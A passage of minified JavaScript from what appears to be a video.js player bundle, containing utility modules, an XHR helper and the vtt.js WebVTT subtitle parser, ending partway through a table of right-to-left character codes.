j(a,b,c,d){c.forEach(function(c){a(b,c,d)})}var k=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0,c.on=d,c.off=e,c.trigger=f,c.one=g,c.fixEvent=h;var l=a("./dom.js"),m=k(l),n=a("./guid.js"),o=k(n),p=a("global/window"),q=k(p),r=a("global/document"),s=k(r)},{"./dom.js":111,"./guid.js":115,"global/document":1,"global/window":2}],113:[function(a,b,c){"use strict";c.__esModule=!0;var d=a("./guid.js"),e=function(a,b,c){b.guid||(b.guid=d.newGUID());var e=function(){return b.apply(a,arguments)};return e.guid=c?c+"_"+b.guid:b.guid,e};c.bind=e},{"./guid.js":115}],114:[function(a,b,c){"use strict";function d(a){var b=void 0===arguments[1]?a:arguments[1];return function(){var 
c=Math.floor(a%60),d=Math.floor(a/60%60),e=Math.floor(a/3600),f=Math.floor(b/60%60),g=Math.floor(b/3600);return(isNaN(a)||a===1/0)&&(e=d=c="-"),e=e>0||g>0?e+":":"",d=((e||f>=10)&&10>d?"0"+d:d)+":",c=10>c?"0"+c:c,e+d+c}()}c.__esModule=!0,c["default"]=d,b.exports=c["default"]},{}],115:[function(a,b,c){"use strict";function d(){return e++}c.__esModule=!0,c.newGUID=d;var e=1},{}],116:[function(a,b,c){"use strict";function d(a,b){var c=Array.prototype.slice.call(b),d=function(){},e=g["default"].console||{log:d,warn:d,error:d};a?c.unshift(a.toUpperCase()+":"):a="log",h.history.push(c),c.unshift("VIDEOJS:"),e[a].apply?e[a].apply(e,c):e[a](c.join(" "))}var e=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var f=a("global/window"),g=e(f),h=function(){d(null,arguments)};h.history=[],h.error=function(){d("error",arguments)},h.warn=function(){d("warn",arguments)},c["default"]=h,b.exports=c["default"]},{"global/window":2}],117:[function(a,b,c){"use strict";function d(a){return!!a&&"object"==typeof a&&"[object Object]"===a.toString()&&a.constructor===Object}function e(){var a=void 0===arguments[0]?{}:arguments[0];return Array.prototype.slice.call(arguments,1).forEach(function(b){h["default"](a,b,function(a,b){return d(b)?d(a)?void 0:e({},b):b})}),a}var f=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0,c["default"]=e;var g=a("lodash-compat/object/merge"),h=f(g);b.exports=c["default"]},{"lodash-compat/object/merge":40}],118:[function(a,b,c){"use strict";c.__esModule=!0;var d=function(a){var b=void 0===arguments[1]?0:arguments[1];return Math.round(a*Math.pow(10,b))/Math.pow(10,b)};c["default"]=d,b.exports=c["default"]},{}],119:[function(a,b,c){"use strict";function d(a,b){return void 0===a&&void 0===b?{length:0,start:function(){throw new Error("This TimeRanges object is empty")},end:function(){throw new Error("This TimeRanges object is empty")}}:{length:1,start:function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(){return a}),end:function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(){return b})}}c.__esModule=!0,c.createTimeRange=d},{}],120:[function(a,b,c){"use strict";function d(a){return a.charAt(0).toUpperCase()+a.slice(1)}c.__esModule=!0,c["default"]=d,b.exports=c["default"]},{}],121:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("global/document"),f=d(e),g=function(a){var b=["protocol","hostname","port","pathname","search","hash","host"],c=f["default"].createElement("a");c.href=a;var d=""===c.host&&"file:"!==c.protocol,e=void 0;d&&(e=f["default"].createElement("div"),e.innerHTML='<a href="'+a+'"></a>',c=e.firstChild,e.setAttribute("style","display:none; position:absolute;"),f["default"].body.appendChild(e));for(var g={},h=0;h<b.length;h++)g[b[h]]=c[b[h]];return"http:"===g.protocol&&(g.host=g.host.replace(/:80$/,"")),"https:"===g.protocol&&(g.host=g.host.replace(/:443$/,"")),d&&f["default"].body.removeChild(e),g};c.parseUrl=g;var h=function(a){if(!a.match(/^https?:\/\//)){var b=f["default"].createElement("div");b.innerHTML='<a href="'+a+'">x</a>',a=b.firstChild.href}return a};c.getAbsoluteURL=h;var i=function(a){if("string"==typeof a){var b=/^(\/?)([\s\S]*?)((?:\.{1,2}|[^\/]+?)(\.([^\.\/\?]+)))(?:[\/]*|[\?].*)$/i,c=b.exec(a);if(c)return c.pop().toLowerCase()}return""};c.getFileExtension=i},{"global/document":1}],122:[function(b,c,d){"use strict";var e=function(a){return 
a&&a.__esModule?a:{"default":a}};d.__esModule=!0;{var f=b("global/document"),g=e(f),h=b("./setup"),i=e(h),j=b("./component"),k=e(j),l=b("./global-options.js"),m=e(l),n=b("./player"),o=e(n),p=b("./plugins.js"),q=e(p),r=b("../../src/js/utils/merge-options.js"),s=e(r),t=b("./utils/fn.js"),u=e(t),v=b("object.assign"),w=(e(v),b("./utils/time-ranges.js")),x=b("./utils/log.js"),y=e(x),z=b("./xhr.js"),A=e(z),B=b("./utils/dom.js"),C=e(B),D=b("./utils/browser.js"),E=e(D),F=b("./extends.js"),G=e(F),H=b("lodash-compat/object/merge"),I=e(H),J=b("./utils/create-deprecation-proxy.js"),K=e(J),L=b("./tech/html5.js"),M=(e(L),b("./tech/flash.js"));e(M)}"undefined"==typeof HTMLVideoElement&&(g["default"].createElement("video"),g["default"].createElement("audio"),g["default"].createElement("track"));var N=function(a,b,c){var d;if("string"==typeof a){if(0===a.indexOf("#")&&(a=a.slice(1)),o["default"].players[a])return b&&y["default"].warn('Player "'+a+'" is already initialised. Options will not be applied.'),c&&o["default"].players[a].ready(c),o["default"].players[a];d=C.getEl(a)}else d=a;if(!d||!d.nodeName)throw new TypeError("The element or ID supplied is not valid. (videojs)");return d.player||new o["default"](d,b,c)};i.autoSetupTimeout(1,N),N.VERSION="5.0.0-rc.32",N.getGlobalOptions=function(){return m["default"]},N.options=K["default"](m["default"],{get:"Access to videojs.options is deprecated; use videojs.getGlobalOptions instead",set:"Modification of videojs.options is deprecated; use videojs.setGlobalOptions instead"}),N.setGlobalOptions=function(a){return s["default"](m["default"],a)},N.getPlayers=function(){return o["default"].players},N.players=K["default"](o["default"].players,{get:"Access to videojs.players is deprecated; use videojs.getPlayers instead",set:"Modification of videojs.players is deprecated"}),N.getComponent=k["default"].getComponent,N.registerComponent=k["default"].registerComponent,N.browser=E,N["extends"]=G["default"],N.mergeOptions=s["default"],N.bind=u.bind,N.plugin=q["default"],N.addLanguage=function(a,b){var c;return a=(""+a).toLowerCase(),I["default"](m["default"].languages,(c={},c[a]=b,c))[a]},N.log=y["default"],N.createTimeRange=w.createTimeRange,N.xhr=A["default"],"function"==typeof a&&a.amd?a("videojs",[],function(){return N}):"object"==typeof d&&"object"==typeof c&&(c.exports=N),d["default"]=N,c.exports=d["default"]},{"../../src/js/utils/merge-options.js":117,"./component":52,"./extends.js":84,"./global-options.js":86,"./player":92,"./plugins.js":93,"./setup":95,"./tech/flash.js":98,"./tech/html5.js":99,"./utils/browser.js":108,"./utils/create-deprecation-proxy.js":110,"./utils/dom.js":111,"./utils/fn.js":113,"./utils/log.js":116,"./utils/time-ranges.js":119,"./xhr.js":123,"global/document":1,"lodash-compat/object/merge":40,"object.assign":44}],123:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("./utils/url.js"),f=d(e),g=a("./utils/log.js"),h=(d(g),a("./utils/merge-options.js")),i=d(h),j=a("global/window"),k=d(j),l=function(a,b){var c=void 0;"string"==typeof a&&(a={uri:a}),a=i["default"]({method:"GET",timeout:45e3},a),b=b||function(){};var d=k["default"].XMLHttpRequest;"undefined"==typeof d&&(d=function(){try{return new k["default"].ActiveXObject("Msxml2.XMLHTTP.6.0")}catch(a){}try{return new k["default"].ActiveXObject("Msxml2.XMLHTTP.3.0")}catch(b){}try{return new k["default"].ActiveXObject("Msxml2.XMLHTTP")}catch(c){}throw new Error("This browser does not support XMLHttpRequest.")});var e=new 
d;e.uri=a.uri;var g=f.parseUrl(a.uri),h=k["default"].location,j=function(){k["default"].clearTimeout(c),b(null,e,e.response||e.responseText)},l=function(a){k["default"].clearTimeout(c),a&&"string"!=typeof a||(a=new Error(a)),b(a,e)},m=g.protocol+g.host!==h.protocol+h.host;!m||!k["default"].XDomainRequest||"withCredentials"in e?!function(){var b="file:"===g.protocol||"file:"===h.protocol;e.onreadystatechange=function(){if(4===e.readyState){if(e.timedout)return l("timeout");200===e.status||b&&0===e.status?j():l()}},a.timeout&&(c=k["default"].setTimeout(function(){4!==e.readyState&&(e.timedout=!0,e.abort())},a.timeout))}():(e=new k["default"].XDomainRequest,e.onload=j,e.onerror=l,e.onprogress=function(){},e.ontimeout=function(){});try{e.open(a.method||"GET",a.uri,!0)}catch(n){return l(n)}a.withCredentials&&(e.withCredentials=!0),a.responseType&&(e.responseType=a.responseType);try{e.send()}catch(n){return l(n)}return e};c["default"]=l,b.exports=c["default"]},{"./utils/log.js":116,"./utils/merge-options.js":117,"./utils/url.js":121,"global/window":2}]},{},[122])(122)}),function(a){var b=a.vttjs={},c=b.VTTCue,d=b.VTTRegion,e=a.VTTCue,f=a.VTTRegion;b.shim=function(){b.VTTCue=c,b.VTTRegion=d},b.restore=function(){b.VTTCue=e,b.VTTRegion=f}}(this),function(a,b){function c(a){if("string"!=typeof a)return!1;var b=h[a.toLowerCase()];return b?a.toLowerCase():!1}function d(a){if("string"!=typeof a)return!1;var b=i[a.toLowerCase()];return b?a.toLowerCase():!1}function e(a){for(var b=1;b<arguments.length;b++){var c=arguments[b];for(var d in c)a[d]=c[d]}return a}function f(a,b,f){var h=this,i=/MSIE\s8\.0/.test(navigator.userAgent),j={};i?h=document.createElement("custom"):j.enumerable=!0,h.hasBeenReset=!1;var k="",l=!1,m=a,n=b,o=f,p=null,q="",r=!0,s="auto",t="start",u=50,v="middle",w=50,x="middle";return Object.defineProperty(h,"id",e({},j,{get:function(){return k},set:function(a){k=""+a}})),Object.defineProperty(h,"pauseOnExit",e({},j,{get:function(){return l},set:function(a){l=!!a}})),Object.defineProperty(h,"startTime",e({},j,{get:function(){return m},set:function(a){if("number"!=typeof a)throw new TypeError("Start time must be set to a number.");m=a,this.hasBeenReset=!0}})),Object.defineProperty(h,"endTime",e({},j,{get:function(){return n},set:function(a){if("number"!=typeof a)throw new TypeError("End time must be set to a number.");n=a,this.hasBeenReset=!0}})),Object.defineProperty(h,"text",e({},j,{get:function(){return o},set:function(a){o=""+a,this.hasBeenReset=!0}})),Object.defineProperty(h,"region",e({},j,{get:function(){return p},set:function(a){p=a,this.hasBeenReset=!0}})),Object.defineProperty(h,"vertical",e({},j,{get:function(){return q},set:function(a){var b=c(a);if(b===!1)throw new SyntaxError("An invalid or illegal string was specified.");q=b,this.hasBeenReset=!0}})),Object.defineProperty(h,"snapToLines",e({},j,{get:function(){return r},set:function(a){r=!!a,this.hasBeenReset=!0}})),Object.defineProperty(h,"line",e({},j,{get:function(){return s},set:function(a){if("number"!=typeof a&&a!==g)throw new SyntaxError("An invalid number or illegal string was specified.");s=a,this.hasBeenReset=!0}})),Object.defineProperty(h,"lineAlign",e({},j,{get:function(){return t},set:function(a){var b=d(a);if(!b)throw new SyntaxError("An invalid or illegal string was specified.");t=b,this.hasBeenReset=!0}})),Object.defineProperty(h,"position",e({},j,{get:function(){return u},set:function(a){if(0>a||a>100)throw new Error("Position must be between 0 and 
100.");u=a,this.hasBeenReset=!0}})),Object.defineProperty(h,"positionAlign",e({},j,{get:function(){return v},set:function(a){var b=d(a);if(!b)throw new SyntaxError("An invalid or illegal string was specified.");v=b,this.hasBeenReset=!0}})),Object.defineProperty(h,"size",e({},j,{get:function(){return w},set:function(a){if(0>a||a>100)throw new Error("Size must be between 0 and 100.");w=a,this.hasBeenReset=!0}})),Object.defineProperty(h,"align",e({},j,{get:function(){return x},set:function(a){var b=d(a);if(!b)throw new SyntaxError("An invalid or illegal string was specified.");x=b,this.hasBeenReset=!0}})),h.displayState=void 0,i?h:void 0}var g="auto",h={"":!0,lr:!0,rl:!0},i={start:!0,middle:!0,end:!0,left:!0,right:!0};f.prototype.getCueAsHTML=function(){return WebVTT.convertCueToDOMTree(window,this.text)},a.VTTCue=a.VTTCue||f,b.VTTCue=f}(this,this.vttjs||{}),function(a,b){function c(a){if("string"!=typeof a)return!1;var b=f[a.toLowerCase()];return b?a.toLowerCase():!1}function d(a){return"number"==typeof a&&a>=0&&100>=a}function e(){var a=100,b=3,e=0,f=100,g=0,h=100,i="";Object.defineProperties(this,{width:{enumerable:!0,get:function(){return a},set:function(b){if(!d(b))throw new Error("Width must be between 0 and 100.");a=b}},lines:{enumerable:!0,get:function(){return b},set:function(a){if("number"!=typeof a)throw new TypeError("Lines must be set to a number.");b=a}},regionAnchorY:{enumerable:!0,get:function(){return f},set:function(a){if(!d(a))throw new Error("RegionAnchorY must be between 0 and 100.");f=a}},regionAnchorX:{enumerable:!0,get:function(){return e},set:function(a){if(!d(a))throw new Error("RegionAnchorX must be between 0 and 100.");e=a}},viewportAnchorY:{enumerable:!0,get:function(){return h},set:function(a){if(!d(a))throw new Error("ViewportAnchorY must be between 0 and 100.");h=a}},viewportAnchorX:{enumerable:!0,get:function(){return g},set:function(a){if(!d(a))throw new Error("ViewportAnchorX must be between 0 and 100.");g=a}},scroll:{enumerable:!0,get:function(){return i},set:function(a){var b=c(a);if(b===!1)throw new SyntaxError("An invalid or illegal string was specified.");i=b}}})}var f={"":!0,up:!0};a.VTTRegion=a.VTTRegion||e,b.VTTRegion=e}(this,this.vttjs||{}),function(a){function b(a,b){this.name="ParsingError",this.code=a.code,this.message=b||a.message}function c(a){function b(a,b,c,d){return 3600*(0|a)+60*(0|b)+(0|c)+(0|d)/1e3}var c=a.match(/^(\d+):(\d{2})(:\d{2})?\.(\d{3})/);return c?c[3]?b(c[1],c[2],c[3].replace(":",""),c[4]):c[1]>59?b(c[1],c[2],0,c[4]):b(0,c[1],c[2],c[4]):null}function d(){this.values=o(null)}function e(a,b,c,d){var e=d?a.split(d):[a];for(var f in e)if("string"==typeof e[f]){var g=e[f].split(c);if(2===g.length){var h=g[0],i=g[1];b(h,i)}}}function f(a,f,g){function h(){var d=c(a);if(null===d)throw new b(b.Errors.BadTimeStamp,"Malformed timestamp: "+k);return a=a.replace(/^[^\sa-zA-Z-]+/,""),d}function i(a,b){var c=new d;e(a,function(a,b){switch(a){case"region":for(var d=g.length-1;d>=0;d--)if(g[d].id===b){c.set(a,g[d].region);break}break;case"vertical":c.alt(a,b,["rl","lr"]);break;case"line":var
e=b.split(","),f=e[0];c.integer(a,f),c.percent(a,f)?c.set("snapToLines",!1):null,c.alt(a,f,["auto"]),2===e.length&&c.alt("lineAlign",e[1],["start","middle","end"]);break;case"position":e=b.split(","),c.percent(a,e[0]),2===e.length&&c.alt("positionAlign",e[1],["start","middle","end"]);break;case"size":c.percent(a,b);break;case"align":c.alt(a,b,["start","middle","end","left","right"])}},/:/,/\s/),b.region=c.get("region",null),b.vertical=c.get("vertical",""),b.line=c.get("line","auto"),b.lineAlign=c.get("lineAlign","start"),b.snapToLines=c.get("snapToLines",!0),b.size=c.get("size",100),b.align=c.get("align","middle"),b.position=c.get("position",{start:0,left:0,middle:50,end:100,right:100},b.align),b.positionAlign=c.get("positionAlign",{start:"start",left:"start",middle:"middle",end:"end",right:"end"},b.align)}function j(){a=a.replace(/^\s+/,"")}var k=a;if(j(),f.startTime=h(),j(),"-->"!==a.substr(0,3))throw new b(b.Errors.BadTimeStamp,"Malformed time stamp (time stamps must be separated by '-->'): "+k);a=a.substr(3),j(),f.endTime=h(),j(),i(a,f)}function g(a,b){function d(){function a(a){return b=b.substr(a.length),a}if(!b)return null;var c=b.match(/^([^<]*)(<[^>]+>?)?/);return a(c[1]?c[1]:c[2])}function e(a){return p[a]}function f(a){for(;o=a.match(/&(amp|lt|gt|lrm|rlm|nbsp);/);)a=a.replace(o[0],e);return a}function g(a,b){return!s[b.localName]||s[b.localName]===a.localName}function h(b,c){var d=q[b];if(!d)return null;var e=a.document.createElement(d);e.localName=d;var f=r[b];return f&&c&&(e[f]=c.trim()),e}for(var i,j=a.document.createElement("div"),k=j,l=[];null!==(i=d());)if("<"!==i[0])k.appendChild(a.document.createTextNode(f(i)));else{if("/"===i[1]){l.length&&l[l.length-1]===i.substr(2).replace(">","")&&(l.pop(),k=k.parentNode);continue}var m,n=c(i.substr(1,i.length-2));if(n){m=a.document.createProcessingInstruction("timestamp",n),k.appendChild(m);continue}var o=i.match(/^<([^.\s/0-9>]+)(\.[^\s\\>]+)?([^>\\]+)?(\\?)>?$/);if(!o)continue;if(m=h(o[1],o[3]),!m)continue;if(!g(k,m))continue;o[2]&&(m.className=o[2].substr(1).replace("."," ")),l.push(o[1]),k.appendChild(m),k=m}return j}function h(a){function b(a,b){for(var c=b.childNodes.length-1;c>=0;c--)a.push(b.childNodes[c])}function c(a){if(!a||!a.length)return null;var d=a.pop(),e=d.textContent||d.innerText;if(e){var f=e.match(/^.*(\n|\r)/);return f?(a.length=0,f[0]):e}return"ruby"===d.tagName?c(a):d.childNodes?(b(a,d),c(a)):void 0}var d,e=[],f="";if(!a||!a.childNodes)return"ltr";for(b(e,a);f=c(e);)for(var g=0;g<f.length;g++){d=f.charCodeAt(g);for(var h=0;h<t.length;h++)if(t[h]===d)return"rtl"}return"ltr"}function i(a){if("number"==typeof a.line&&(a.snapToLines||a.line>=0&&a.line<=100))return a.line;if(!a.track||!a.track.textTrackList||!a.track.textTrackList.mediaElement)return-1;for(var b=a.track,c=b.textTrackList,d=0,e=0;e<c.length&&c[e]!==b;e++)"showing"===c[e].mode&&d++;return-1*++d}function j(){}function k(a,b,c){var d=/MSIE\s8\.0/.test(navigator.userAgent),e="rgba(255, 255, 255, 1)",f="rgba(0, 0, 0, 0.8)";d&&(e="rgb(255, 255, 255)",f="rgb(0, 0, 0)"),j.call(this),this.cue=b,this.cueDiv=g(a,b.text);var 
i={color:e,backgroundColor:f,position:"relative",left:0,right:0,top:0,bottom:0,display:"inline"};d||(i.writingMode=""===b.vertical?"horizontal-tb":"lr"===b.vertical?"vertical-lr":"vertical-rl",i.unicodeBidi="plaintext"),this.applyStyles(i,this.cueDiv),this.div=a.document.createElement("div"),i={textAlign:"middle"===b.align?"center":b.align,font:c.font,whiteSpace:"pre-line",position:"absolute"},d||(i.direction=h(this.cueDiv),i.writingMode=""===b.vertical?"horizontal-tb":"lr"===b.vertical?"vertical-lr":"vertical-rl",i.unicodeBidi="plaintext"),this.applyStyles(i),this.div.appendChild(this.cueDiv);var k=0;switch(b.positionAlign){case"start":k=b.position;break;case"middle":k=b.position-b.size/2;break;case"end":k=b.position-b.size}this.applyStyles(""===b.vertical?{left:this.formatStyle(k,"%"),width:this.formatStyle(b.size,"%")}:{top:this.formatStyle(k,"%"),height:this.formatStyle(b.size,"%")}),this.move=function(a){this.applyStyles({top:this.formatStyle(a.top,"px"),bottom:this.formatStyle(a.bottom,"px"),left:this.formatStyle(a.left,"px"),right:this.formatStyle(a.right,"px"),height:this.formatStyle(a.height,"px"),width:this.formatStyle(a.width,"px")})}}function l(a){var b,c,d,e,f=/MSIE\s8\.0/.test(navigator.userAgent);if(a.div){c=a.div.offsetHeight,d=a.div.offsetWidth,e=a.div.offsetTop;var g=(g=a.div.childNodes)&&(g=g[0])&&g.getClientRects&&g.getClientRects();a=a.div.getBoundingClientRect(),b=g?Math.max(g[0]&&g[0].height||0,a.height/g.length):0}this.left=a.left,this.right=a.right,this.top=a.top||e,this.height=a.height||c,this.bottom=a.bottom||e+(a.height||c),this.width=a.width||d,this.lineHeight=void 0!==b?b:a.lineHeight,f&&!this.lineHeight&&(this.lineHeight=13)}function m(a,b,c,d){function e(a,b){for(var e,f=new l(a),g=1,h=0;h<b.length;h++){for(;a.overlapsOppositeAxis(c,b[h])||a.within(c)&&a.overlapsAny(d);)a.move(b[h]);if(a.within(c))return a;var i=a.intersectPercentage(c);g>i&&(e=new l(a),g=i),a=new l(f)}return e||f}var f=new l(b),g=b.cue,h=i(g),j=[];if(g.snapToLines){var k;switch(g.vertical){case"":j=["+y","-y"],k="height";break;case"rl":j=["+x","-x"],k="width";break;case"lr":j=["-x","+x"],k="width"}var m=f.lineHeight,n=m*Math.round(h),o=c[k]+m,p=j[0];Math.abs(n)>o&&(n=0>n?-1:1,n*=Math.ceil(o/m)*m),0>h&&(n+=""===g.vertical?c.height:c.width,j=j.reverse()),f.move(p,n)}else{var q=f.lineHeight/c.height*100;switch(g.lineAlign){case"middle":h-=q/2;break;case"end":h-=q}switch(g.vertical){case"":b.applyStyles({top:b.formatStyle(h,"%")});break;case"rl":b.applyStyles({left:b.formatStyle(h,"%")});break;case"lr":b.applyStyles({right:b.formatStyle(h,"%")})}j=["+y","-x","+x","-y"],f=new l(b)}var r=e(f,j);b.move(r.toCSSCompatValues(c))}function n(){}var o=Object.create||function(){function a(){}return function(b){if(1!==arguments.length)throw new Error("Object.create shim only accepts one parameter.");return a.prototype=b,new a}}();b.prototype=o(Error.prototype),b.prototype.constructor=b,b.Errors={BadSignature:{code:0,message:"Malformed WebVTT signature."},BadTimeStamp:{code:1,message:"Malformed time stamp."}},d.prototype={set:function(a,b){this.get(a)||""===b||(this.values[a]=b)},get:function(a,b,c){return c?this.has(a)?this.values[a]:b[c]:this.has(a)?this.values[a]:b},has:function(a){return a in this.values},alt:function(a,b,c){for(var d=0;d<c.length;++d)if(b===c[d]){this.set(a,b);break}},integer:function(a,b){/^-?\d+$/.test(b)&&this.set(a,parseInt(b,10))},percent:function(a,b){var c;return(c=b.match(/^([\d]{1,3})(\.[\d]*)?%$/))&&(b=parseFloat(b),b>=0&&100>=b)?(this.set(a,b),!0):!1}};var
p={"&amp;":"&","&lt;":"<","&gt;":">","&lrm;":"\u200e","&rlm;":"\u200f","&nbsp;":"\u00a0"},q={c:"span",i:"i",b:"b",u:"u",ruby:"ruby",rt:"rt",v:"span",lang:"span"},r={v:"title",lang:"lang"},s={rt:"ruby"},t=[1470,1472,1475,1478,1488,1489,1490,1491,1492,1493,1494,1495,1496,1497,1498,1499,1500,1501,1502,1503,1504,1505,1506,1507,1508,1509,1510,1511,1512,1513,1514,1520,1521,1522,1523,1524,1544,1547,1549,1563,1566,1567,1568,1569,1570,1571,1572,1573,1574,1575,1576,1577,1578,1579,1580,1581,1582,1583,1584,1585,1586,1587,1588,1589,1590,1591,1592,1593,1594,1595,1596,1597,1598,1599,1600,1601,1602,1603,1604,1605,1606,1607,1608,1609,1610,1645,1646,1647,1649,1650,1651,1652,1653,1654,1655,1656,1657,1658,1659,1660,1661,1662,1663,1664,1665,1666,1667,1668,1669,1670,1671,1672,1673,1674,1675,1676,1677,1678,1679,1680,1681,1682,1683,1684,1685,1686,1687,1688,1689,1690,1691,1692,1693,1694,1695,1696,1697,1698,1699,1700,1701,1702,1703,1704,1705,1706,1707,1708,1709,1710,1711,1712,1713,1714,1715,1716,1717,1718,1719,1720,1721,1722,1723,1724,1725,1726,1727,1728,1729,1730,1731,1732,1733,1734,1735,1736,1737,1738,1739,1740,1741,1742,1743,1744,1745,1746,1747,1748,1749,1765,1766,1774,1775,1786,1787,1788,1789,1790,1791,1792,1793,1794,1795,1796,1797,1798,1799,1800,1801,1802,1803,1804,1805,1807,1808,1810,1811,1812,1813,1814,1815,1816,1817,1818,1819,1820,1821,1822,1823,1824,1825,1826,1827,1828,1829,1830,1831,1832,1833,1834,1835,1836,1837,1838,1839,1869,1870,1871,1872,1873,1874,1875,1876,1877,1878,1879,1880,1881,1882,1883,1884,1885,1886,1887,1888,1889,1890,1891,1892,1893,1894,1895,1896,1897,1898,1899,1900,1901,1902,1903,1904,1905,1906,1907,1908,1909,1910,1911,1912,1913,1914,1915,1916,1917,1918,1919,1920,1921,1922,1923,1924,1925,1926,1927,1928,1929,1930,1931,1932,1933,1934,1935,1936,1937,1938,1939,1940,1941,1942,1943,1944,1945,1946,1947,1948,1949,1950,1951,1952,1953,1954,1955,1956,1957,1969,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2e3,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2011,2012,2013,2014,2015,2016,2017,2018,2019,2020,2021,2022,2023,2024,2025,2026,2036,2037,2042,2048,2049,2050,2051,2052,2053,2054,2055,2056,2057,2058,2059,2060,2061,2062,2063,2064,2065,2066,2067,2068,2069,2074,2084,2088,2096,2097,2098,2099,2100,2101,2102,2103,2104,2105,2106,2107,2108,2109,2110,2112,2113,2114,2115,2116,2117,2118,2119,2120,2121,2122,2123,2124,2125,2126,2127,2128,2129,2130,2131,2132,2133,2134,2135,2136,2142,2208,2210,2211,2212,2213,2214,2215,2216,2217,2218,2219,2220,8207,64285,64287,64288,64289,64290,64291,64292,64293,64294,64295,64296,64298,64299,64300,64301,64302,64303,64304,64305,64306,64307,64308,64309,64310,64312,64313,64314,64315,64316,64318,64320,64321,64323,64324,64326,64327,64328,64329,64330,64331,64332,64333,64334,64335,64336,64337,64338,64339,64340,64341,64342,64343,64344,64345,64346,64347,64348,64349,64350,64351,64352,64353,64354,64355,64356,64357,64358,64359,64360,64361,64362,64363,64364,64365,64366,64367,64368,64369,64370,64371,64372,64373,64374,64375,64376,64377,64378,64379,64380,64381,64382,64383,64384,64385,64386,64387,64388,64389,64390,64391,64392,64393,64394,64395,64396,64397,64398,64399,64400,64401,64402,64403,64404,64405,64406,64407,64408,64409,64410,64411,64412,64413,64414,64415,64416,64417,64418,64419,64420,64421,64422,64423,64424,64425,64426,64427,64428,64429,64430,64431,64432,64433,64434,64435,64436,64437,64438,64439,64440,64441,64442,64443,64444,64445,64446,64447,64448,64449,64467,64468,64469,64470,64471,64472,64473,64474,64475,64476,64477,64478,64479,64480,64481,64482,64483,64484,64485,64486,64487,64488,64489,64490
,64491,64492,64493,64494,64495,64496,64497,64498,64499,64500,64501,64502,64503,64504,64505,64506,64507,64508,64509,64510,64511,64512,64513,64514,64515,64516,64517,64518,64519,64520,64521,64522,64523,64524,64525,64526,64527,64528,64529,64530,64531,64532,64533,64534,64535,64536,64537,64538,64539,64540,64541,64542,64543,64544,64545,64546,64547,64548,64549,64550,64551,64552,64553,64554,64555,64556,64557,64558,64559,64560,64561,64562,64563,64564,64565,64566,64567,64568,64569,64570,64571,64572,64573,64574,64575,64576,64577,64578,64579,64580,64581,64582,64583,64584,64585,64586,64587,64588,64589,64590,64591,64592,64593,64594,64595,64596,64597,64598,64599,64600,64601,64602,64603,64604,64605,64606,64607,64608,64609,64610,64611,64612,64613,64614,64615,64616,64617,64618,64619,64620,64621,64622,64623,64624,64625,64626,64627,64628,64629,64630,64631,64632,64633,64634,64635,64636,64637,64638,64639,64640,64641,64642,64643,64644,64645,64646,64647,64648,64649,64650,64651,64652,64653,64654,64655,64656,64657,64658,64659,64660,64661,64662,64663,64664,64665,64666,64667,64668,64669,64670,64671,64672,64673,64674,64675,64676,64677,64678,64679,64680,64681,64682,64683,64684,64685,64686,64687,64688,64689,64690,64691,64692,64693,64694,64695,64696,64697,64698,64699,64700,64701,64702,64703,64704,64705,64706,64707,64708,64709,64710,64711,64712,64713,64714,64715,64716,64717,64718,64719,64720,64721,64722,64723,64724,64725,64726,64727,64728,64729,64730,64731,64732,64733,64734,64735,64736,64737,64738,64739,64740,64741,64742,64743,64744,64745,64746,64747,64748,64749,64750,64751,64752,64753,64754,64755,64756,64757,64758,64759,64760,64761,64762,64763,64764,64765,64766,64767,64768,64769,64770,64771,64772,64773,64774,64775,64776,64777,64778,64779,64780,64781,64782,64783,64784,64785,64786,64787,64788,64789,64790,64791,64792,64793,64794,64795,64796,64797,64798,64799,64800,64801,64802,64803,64804,64805,64806,64807,64808,64809,64810,64811,64812,64813,64814,64815,64816,64817,64818,64819,64820,64821,64822,64823,64824,64825,64826,64827,64828,64829,64848,64849,64850,64851,64852,64853,64854,64855,64856,64857,64858,64859,64860,64861,64862,64863,64864,64865,64866,64867,64868,64869,64870,64871,64872,64873,64874,64875,64876,64877,64878,64879,64880,64881,64882,64883,64884,64885,64886,64887,64888,64889,64890,64891,64892,64893,64894,64895,64896,64897,64898,64899,64900,64901,64902,64903,64904,64905,64906,64907,64908,64909,64910,64911,64914,64915,64916,64917,64918,64919,64920,64921,64922,64923,64924,64925,64926,64927,64928,64929,64930,64931,64932,64933,64934,64935,64936,64937,64938,64939,64940,64941,64942,64943,64944,64945,64946,64947,64948,64949,64950,64951,64952,64953,64954,64955,64956,64957,64958,64959,64960,64961,64962,64963,64964,64965,64966,64967,65008,65009,65010,65011,65012,65013,65014,65015,65016,65017,65018,65019,65020,65136,65137,65138,65139,65140,65142,65143,65144,65145,65146,65147,65148,65149,65150,65151,65152,65153,65154,65155,65156,65157,65158,65159,65160,65161,65162,65163,65164,65165,65166,65167,65168,65169,65170,65171,65172,65173,65174,65175,65176,65177,65178,65179,65180,65181,65182,65183,65184,65185,65186,65187,65188,65189,65190,65191,65192,65193,65194,65195,65196,65197,65198,65199,65200,65201,65202,65203,65204,65205,65206,65207,65208,65209,65210,65211,65212,65213,65214,65215,65216,65217,65218,65219,65220,65221,65222,65223,65224,65225,65226,65227,65228,65229,65230,65231,65232,65233,65234,65235,65236,65237,65238,65239,65240,65241,65242,65243,65244,65245,65246,65247,65248,65249,65250,65251,65252,65253,65254,65255,65256,65257,65258,65
